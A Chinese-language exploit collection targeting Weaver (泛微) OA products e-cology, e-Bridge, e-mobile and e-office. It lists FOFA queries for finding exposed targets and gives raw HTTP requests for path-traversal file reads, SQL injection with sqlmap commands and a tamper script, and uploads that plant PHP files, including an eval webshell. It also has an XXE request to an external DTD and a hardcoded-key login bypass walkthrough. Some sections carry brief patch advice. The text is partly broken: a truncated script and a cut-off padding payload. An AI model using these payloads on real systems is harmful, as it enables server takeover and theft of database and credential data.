泛微系列
- 泛微e-cology getE9DevelopAllNameValue2接口存在任意文件读取
- WeaverOA_EBridge
- WeaverOA _Emobile
- WeaverOA_EOffice
- 任意文件读取
- 泛微-E-office 前台文件包含漏洞
- 泛微E-Office远程代码执行漏洞
- 前台 fileupload
- E-Office9
- UserSelect 未授权访问
- mysql_config.ini 数据库信息泄漏
- CVE-2023-2648文件上传
- 95_ajax_fileupload CVE-2023-2523
- 泛微eoffice-cnvd-2022-43246布尔注入
- mobile_upload_save 任意文件上传漏洞
- 文件包含漏洞 (CNVD-2022-43247)@2022/6/7
- SQL 注入漏洞 (CNVD-2022-43246)@2022/6/8
- welink-move__fileupload@20230922
- json_common_sqli@20230922
- WeaverOA_Ecology
- E-Cology前台某接口存在SQL注入
- V8_sqli
- V9 @2022/7/26
- V9_文件上传@2022/7/26
- V9_代码执⾏
- xmlrpcServlet接口任意文件读取漏洞
- download.php任意文件读取漏洞
- emessage 管理界面 存在任意文件读取
- do.php 存在未授权访问
泛微e-cology getE9DevelopAllNameValue2接口存在任意文件读取
https://mp.weixin.qq.com/s/DGQRYKvkrbyGVmZv1H6y1g
app=“泛微-OA(e-cology)”
GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Connection: Keep-Alive
X-Forwarded-For: 127.0.0.1
X-Originating: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
(7).泛微Ecology----------------------------------------fofa:app=“泛微-协同办公OA”
(8).泛微Emobile----------------------------------------fofa:title=“移动管理平台-企业管理”
(9).泛微Eoffice----------------------------------------fofa:app=“泛微-EOffice”
WeaverOA_E_cology_WorkflowServiceXml_Rce漏洞
WeaverOA_Weaver_common_Ctrl_FileUpload漏洞
WeaverOA_E_Cology_getSqlData_SqInjection漏洞
WeaverOA_E_Cology_LoginSSO_Sqlinjection漏洞
WeaverOA_E_Office_Upload_Getshell漏洞
WeaverOA_E_Cology_DBconfigReader漏洞
WeaverOA_Mysql_config_Information漏洞
WeaverOA_E_Bridge_任意文件读取漏洞
WeaverOA_V9_Upload_Getshell漏洞
WeaverOA_E_Mobile_Ongl_Rce漏洞
WeaverOA_V8_Sqlinjection漏洞
[+]泛微E-Office9文件上传漏洞 CVE-2023-2648
[+]泛微 E-Office 任意文件上传漏洞(CVE-2023-2523)
[+]泛微 ShowDocsImage SQL注入漏洞
[+]泛微E-Cology XXE漏洞(QVD-2023-16177)
[+]泛微OA E-Cology V9 browser.jsp SQL注入漏洞
[+]泛微 e-cology ofsLogin任意用户登录漏洞
[+]泛微E-Cology /CheckServer.jsp 路径SQL注入漏洞(QVD-2023-9849)
[+]泛微SQL注入漏洞(CVE_2023_15672)
e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)
e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)
e-cology BshServlet-RCE (可直接执行系统命令)
e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)
e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)
e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)
e-office8 fileupload-RCE (默认写入冰蝎4.0.3aes)
e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)
e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)
e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)
WeaverOA_EBridge
app=“泛微-云桥e-Bridge”
介绍
某微云桥(e-Bridge)是上海某微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。
截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,
企业可以通过e-Bridge快速实现基于微信及钉钉的移动办公应用接入。
对于某微协同办公产品e-cology更是实现了可视化的配置接入。
后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。
SQL注入@2022/7/11
前台无条件SQL注入,获取系统数据库内容信息。
EXP:
sqlmap -u "http://IP:8088/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1*" -v 3 --random-agent --level 5
https://mp.weixin.qq.com/s/RFCSYhnB_VrL065HUc7Eeg
泛微云桥 e-Bridge SQL注入
CNVD-2022-44187是一个泛微云桥e-Bridge的SQL注入漏洞,影响范围包括v4.0、v9.0 141103和v9.5 20220113版本。1
这个漏洞的POC是利用泛微云桥的多个接口,通过构造恶意的参数,执行SQL语句,获取数据库敏感信息。2
一个可能的POC是:
POST /ebridge/portal/portal/portalAction.do?method=showPortal HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
portalId=1&portalName=1&portalType=1&isDefault=1&sort=1%27+and+sleep(5)
这个POC会向/ebridge/portal/portal/portalAction.do接口发送一个POST请求,其中sort参数的值为1’ and sleep(5),这会导致SQL语句在执行时延迟5秒,从而产生时间盲注的效果。如果响应时间超过5秒,说明存在SQL注入漏洞。
WeaverOA _Emobile
fofa: title=“移动管理平台-企业管理” || title=“泛微移动平台e-mobile”
lang2sql_fileupload
https://mp.weixin.qq.com/s/EXMrzPjp7yibxNMOwGtEng
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: 219.146.76.226:89
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 226
Expect: 100-continue
Connection: close
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/111111.txt"
This site has a vulnerability !!!
------WebKitFormBoundarymVk33liI64J7GQaK--
https://mp.weixin.qq.com/s/b62pUnIjA-x5d58YijX1Rg
敏感信息泄露
sqli
20余处 SQL注入历史漏洞
(1)/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 //参数RUN_ID
(2)/E-mobile/flowdo_page.php?diff=delete&flowid=1 //参数flowid
(3)/E-mobile/flowsorce_page.php?flowid=2
(4)/E-mobile/flownext_page.php?diff=candeal&detailid=2
(5)/E-mobile/flowimage_page.php?FLOW_ID=2
(6)/E-mobile/flowform_page.php?FLOW_ID=2
(7)/E-mobile/diaryother_page.php?searchword=23
(8)/E-mobile/create/ajax_do.php?diff=word&sortid=1 //参数sortid
(9)/E-mobile/create/ajax_do.php?diff=word&idstr=2 //参数idstr
(10)/E-mobile/flow/freeflowimg.php?RUN_ID=1
(11)/E-mobile/create/ajax_do.php?diff=addr&sortid=1 //参数sortid
(12)/E-mobile/create/ajax_do.php?diff=addr&userdept=1 //参数userdept
(13)/E-mobile/create/ajax_do.php?diff=addr&userpriv=1 //参数userpriv
(14)/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 //参数idstr
(15)/E-mobile/flow/flowhave_page.php?detailid=2,3
(16)/E-mobile/flow/flowtype_free.php?flowid=1
(17)/E-mobile/flow/flowtype_free.php?runid=1
(18)/E-mobile/flow/flowtype_other.php?flowid=1
(19)/E-mobile/flow/flowtype_other.php?runid=1
(20)/E-mobile/flow/freeflowimage_page.php?fromid=2
(21)/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 //参数runid
信息来源
https://vulners.com/seebug/SSV:91116
https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0126024
前台文件包含
CNVD-2022-43247
2022/6/8
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls
CNVD-2022-43246_sqli@2022/6/8
v9.5
E-Mobile 6.6
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: xx:8088
Content-Length: 338
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php@"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
WeaverOA_EOffice
fofa: app=“泛微-EOffice”
任意文件读取
泛微-E-office 前台文件包含漏洞
泛微E-Office远程代码执行漏洞
前台 fileupload
https://mp.weixin.qq.com/s/l1FGw3CArSIHTVo142j48g
泛微eoffice是一款为企业提供便捷、规范的办公环境的协同办公产品。它基于Windows平台,采用模块化设计,支持大型数据库,具备快速响应、容量大、安装维护简单等特点。泛微eoffice采用先进的协同技术,支持多人协同工作,实现高效的信息共享和流程协作。同时,它还提供全面的工作流管理功能,可轻松设定各种复杂的工作流程,提高工作效率。此外,泛微eoffice注重保护知识产权,采用多种版权保护措施。作为一款普及协同办公的重要产品,泛微eoffice为全国范围内的企业提供了有力的支持,帮助企业实现高效的协同工作。
app="泛微-EOffice"
0x04 漏洞复现
python3 main.py -f url.txt -p weaver-eoffice-file-upload-file-upload
0x05 修复建议
1、限制file-upload接口访问
2、升级泛微eoffice系统至最新版本
3、官网下载最新安全补丁:https://www.weaver.com.cn/
|weaver|e-office||sample_save_image|pass_upload|||[https://mp.weixin.qq.com/s/Nq4z3veDgGnB4ky5Ff5gQQ](https://mp.weixin.qq.com/s/Nq4z3veDgGnB4ky5Ff5gQQ)||||app="泛微-EOffice"|e-office=9.5||||
{"id":"67","file_name":"weaver-eoffice-officeserver-writefile.yml.bin","encryption":"standard","md5":"11cdd647829c5f04777af2483d16245b","size":1013},
poc-yaml-weaver-eoffice-arbitrary-cnvd-2021-49104-file-upload
poc-yaml-weaver-oa-eoffice-information-disclosure
poc-yaml-weaver-eoffice-userselect-unauth
poc-yaml-eweaver-eoffice-ajax-upload
poc-yaml-eoffice10-file-upload
poc-yaml-eweaver-eoffice-mainselect-info-leak
poc-yaml-ecology-oa-eoffice-officeserver-php-file-read
E-Office9
cc_parent_id=-999+%2F%2A%2150000union%2A%2F+%2F%2A%2150000select%2A%2F+23333%2C%28%2F%2A%2150000select%2A%2F+%40%40secure_file_priv%29%23
UserSelect 未授权访问
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。泛微OA E-Office UserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息。
漏洞编号:无
漏洞类型:未授权访问
影响版本:泛微OA E-Office
POC:
GET /UserSelect/ HTTP/1.1
Content-Type: application/josn
修复建议:
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://service.e-office.cn/download
mysql_config.ini 数据库信息泄漏
泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息。
漏洞编号:无
漏洞类型:信息泄露
影响版本:泛微OA E-Office
POC:
GET /mysql_config.ini HTTP/1.1
Content-Type: application/josn
修复建议:
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://service.e-office.cn/download
CVE-2023-2648文件上传
app="泛微-EOffice"
泛微e-office 9.5版本源文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
**漏洞编号**:CVE-2023-2648
**漏洞类型**:任意文件上传
**影响版本**:泛微e-office 9.5版本
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 259
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Accept-Encoding: gzip
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
Content-Type: image/jpeg
<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>
--e64bdf16c554bbc109cecef6451c26a4--
路径
/attachment/3466744850/xxx.php
95_ajax_fileupload CVE-2023-2523
泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
漏洞编号:CVE-2023-2523
漏洞类型:任意文件上传
影响版本:泛微e-office 9.5版本
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: 218.77.106.77:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Length: 350
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Origin: null
Upgrade-Insecure-Requests: 1
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="tkl.phP"
Content-Type: image/jpeg
<?php eval($_POST[sbaming]);?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
泛微eoffice-cnvd-2022-43246布尔注入
mobile_upload_save 任意文件上传漏洞
文件包含漏洞 (CNVD-2022-43247)@2022/6/7
https://zhuanlan.zhihu.com/p/559846525
SQL 注入漏洞 (CNVD-2022-43246)@2022/6/8
https://zhuanlan.zhihu.com/p/559846525
welink-move__fileupload@20230922
POST /eoffice10/server/public/api/welink/welink-move HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
json_common_sqli@20230922
POST /building/json_common.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: LOGIN_LANG=cn; PHPSESSID=6791ececa7e6366d31a912599b3f518a
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
tfs=city`%20where%20cityId%20=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,7778,445,%20(/*!50000select*/%20concat(111*111,user()))#|3
WeaverOA_Ecology
FOFA语句:app=“泛微-协同商务系统” || app=“泛微-协同办公OA”
泛微e-cology信息泄漏任意用户登录漏洞
安全补丁 < 10.57.2
泛微e-cology CheckServer SQL注入漏洞
安全补丁 < 10.57
泛微e-cology Browser SQL注入漏洞
安全补丁 < 10.55
e-cology9_sqli
泛微 e-cology9 ≤ 10.55
未授权sqli
e-cology9 ≤ v10.56
前台任意用户登录漏洞
e-cology9 < 10.57.2
ShowDocsImageServlet_sqli
GET
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 10.1.1.1
User-Agent:Mozilla/5.0(Macintosh;Intel Mac OS X10_14_3) AppleWebKit/605.1.15(KHTML
like Gecko)5bGx5rW35LmL5YWz
Accept-Encoding:gzipdeflate
Connection:close
E-Cology前台某接口存在SQL注入
E-Cology以移动互联下的组织社交化转型需求为导向,采用轻前端重后端的设计思路,在前端面向用户提供个性化的办公平台,后端引擎帮助企业高效整合既有的IT资源生成符合用户需求的IT应用,并能够与e-mobile、移动集成平台等双剑合璧,帮助企业通过APP、微信、钉钉等多种路径实现移动协同办公。
漏洞类型:SQL注入漏洞
影响:影响系统的完整性与机密性,造成数据库信息泄露,可进一步造成其他的安全风险
简述:泛微E-Cology8存在未授权的SQL注入漏洞,远程攻击者利用该漏洞在无需任何授权前提下,可前台执行SQL注入并获取数据库敏感信息,造成严重的信息泄露以及其他可能的安全风险。漏洞风险等级高危。
1. 泛微OA为商用软件,请联系官方获取系统升级补丁
2. 不方便系统升级可部署WAF对攻击进行拦截
3. 人工检查注入接口,增加过滤语句
https://cn-sec.com/archives/1803545.html
https://articles.zsxq.com/id_wi76x3rtxf14.html
FileDownloadForOutDoc SQL注入
泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
漏洞编号:CVE-2023-15672
漏洞类型:SQL注入
影响版本:Ecology 9.x 补丁版本 < 10.58.0;Ecology 8.x 补丁版本 < 10.58.0
GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host:***
Accept:*/*
Connection: close
sqlmap利用:
请求遍历随机数去配合payload实现注入的tamper脚本
import os,re,random
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
priority = PRIORITY.HIGHEST
def tamper(payload, **kwargs):
result = ""
num = random.randint(1,2**27)
result = str(num)+payload
return resul
python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs
前台任意用户登陆
九维团队-绿队(改进)| 泛微Ecology信息泄露&前台任意用户登陆漏洞简要分析及防御
https://mp.weixin.qq.com/s/HTLv1nGV4UaTZ9idUrEQ4Q
新的安全漏洞补丁,修复了信息泄露和任意用户登录漏洞,
该漏洞是由于系统未对系统接口的响应进行合理的处理,导致该系统会泄漏用户信息,
由于系统硬编码了AES的KEY值,攻击者可利用信息泄露漏洞获取到的loginid导致任意用户登录系统。
根据补丁对比找到接口。
/mobile/plugin/changeuserinfo.jsp
根据手机号模糊查询loginid。
首先查一下共有多少个,数量大于1响应为{"status":"0"},当等于1时输出查到的loginid。
根据提供的用户ID列表,获取这些用户的信息,然后将获取到的信息返回。 获取到的只有id、name、avatar_url三个字段。
mobile/plugin/1/ofsLogin.jsp
重点在if语句上,当loginTokenFromThird等于loginTokenFromThird2时进入else中,
前者的值是参数传进来的,后者经过为AES加密得到的。
AES加密的key是syscode+Prop.getPropValue
("transferE9","secretkey")对receiver+timestamp进行加密。
看AES加密部分。
首先是key。
Prop.getPropValue("transferE9","secretkey")为中从配置文件transferE9.properties中获取secretkey的值。
key就等于传递过来的参数syscode加上secretkey的值。
secretkey还是硬编码在配置文件中的。此时我们调用AES加密并将加密后的值通过loginTokenFromThird传入即可进入else中。
确定登录方式,查看数据库,默认安装的ofs_sendinfo表中hrmtransrule是空的,
所以此时hrmtransrule参数必定会被赋值为1,
因此登录方式固定为loginid,loginid由receiver决定所以将信息泄露中获取到的loginid传递给receiver参数就可以完成登录了。
查询的库是HrmResource所以并不能登录管理员。
第一处可以直接模糊匹配,
第二处信息泄露并未返回loginid字段,所以要根据name猜测login的值,随后加密后登录即可。
HrmCareerApplyPerView_sqli
洞描述:
泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。泛微e-cology 的 HrmCareerApplyPerView 接口存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。
POC:
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7
id: FanWeiOA_E-Cology_HrmCareerApplyPerView_SQL
info:
name: FanWeiOA_E-Cology_HrmCareerApplyPerView_SQL
author: sm
severity: critical
tags: FanWei
requests:
- raw:
- |
GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
matchers:
- type: word
words:
- "class="
- "900150983cd24fb0d6963f7d28e17f72"
condition: and
G:\Hack\EXP\Serein
`
dwr SQL 注⼊
POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0
ReceiveCCRequestByXml XXE
泛微e-cology前台XXE注入漏洞 安全补丁 < 10.58.1
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
漏洞编号:QVD-2023-16177
漏洞类型:XXE
影响版本:泛微 EC 9.x 且补丁版本 < 10.58.2;泛微 EC 8.x 且补丁版本 < 10.58.2
POC:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:***
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
EXP1:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:****
Content-Type: application/xml
EXP2:
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host:***
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>
修复建议:
1.限制访问来源地址,如非必要,不要将系统开放在互联网上。
2.目前官方已发布10.58.2来修复此漏洞,建议受影响用户更新至10.58.2
https://www.weaver.com.cn/cs/securityDownload.html#
browser.jsp SQL注入
泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
漏洞编号:CNVD-2023-12632
漏洞类型:SQL注入
影响版本:泛微e-cology V9 < 10.56
POST /mobile/plugin/browser.jsp HTTP/1.1
Host:***
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for:***
x-originating-ip:***
x-remote-ip: ***
x-remote-addr:***
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
修复建议:
升级至安全版本,官方修复方案
https://www.weaver.com.cn/cs/securityDownload.asp#
前台 WorkflowCenterTreeData.jsp SQL注入
由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。
漏洞编号:无
漏洞类型:SQL注入
影响版本:使用oracle数据库的泛微 e-cology OA 系统
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host:***
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%